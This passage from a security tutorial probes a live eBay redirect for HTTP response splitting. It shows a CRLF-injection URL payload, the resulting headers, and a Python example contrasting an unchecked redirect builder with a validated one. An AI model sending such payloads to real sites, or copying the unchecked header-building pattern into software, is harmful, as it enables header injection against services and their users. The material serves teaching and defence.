
[Server Response Headers]
HTTP/1.x 301 Moved Permanently
Location: http://www.ebay.com/
Connection: close
It looks like this might be filtered, but let’s conduct a few experiments before
we assume that it’s not possible to inject any data.
[Our URL]
http://click3.ebay.com/230708911.57033.0.58042/%0d%0aHTTP/1.1%20200%20OK
[Client Request Headers]
GET /230708911.57033.0.58042/%0d%0aHTTP/1.1%20200%20OK HTTP/1.1
Host: click3.ebay.com
[Server Response Headers]
HTTP/1.x 301 Moved Permanently
Location: 1 200 ok
Connection: close
The response is more interesting this time: we see Location: 1 200 OK,
which indicates that the dot is filtered for some reason, but after ...
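
Seen from the server side, the experiment above comes down to whether a percent-decoded path can reach the Location header with CR or LF intact. The following is an added example, not code from the original text or from the site discussed: a redirect builder shown unchecked and then with control characters rejected. The routing rule (everything after the first path segment becomes the target) and all function names are assumptions made for illustration.

```python
from urllib.parse import quote, unquote

# Constructed sample inputs: the request path from the experiment above,
# and a harmless path for comparison.
SAMPLE_PATH = "/230708911.57033.0.58042/%0d%0aHTTP/1.1%20200%20OK"
BENIGN_PATH = "/230708911.57033.0.58042/itm/12345"

RESPONSE = ("HTTP/1.1 301 Moved Permanently\r\n"
            "Location: {location}\r\n"
            "Connection: close\r\n\r\n")


def redirect_target(path: str) -> str:
    """Hypothetical routing rule: everything after the first segment."""
    parts = path.split("/", 2)
    return parts[2] if len(parts) > 2 else ""


def build_redirect_unsafe(path: str) -> bytes:
    """Decodes the target and writes it into the header unchecked."""
    location = unquote(redirect_target(path))
    return RESPONSE.format(location=location).encode("latin-1")


def build_redirect_safe(path: str) -> bytes:
    """Rejects control characters after decoding, then re-encodes."""
    decoded = unquote(redirect_target(path))
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        raise ValueError("control character in redirect target")
    # Re-encoding keeps the header value pure ASCII with no raw specials.
    location = "/" + quote(decoded, safe="/")
    return RESPONSE.format(location=location).encode("ascii")


def header_lines(response: bytes) -> list[str]:
    """Header lines as a client would split them (up to the blank line)."""
    head = response.split(b"\r\n\r\n", 1)[0]
    return head.decode("latin-1").split("\r\n")


if __name__ == "__main__":
    print(header_lines(build_redirect_unsafe(SAMPLE_PATH)))
    print(header_lines(build_redirect_safe(BENIGN_PATH)))
```

The validation runs after decoding, because the raw request line contains only the harmless text %0d%0a; the CR and LF exist only once the server has unescaped it.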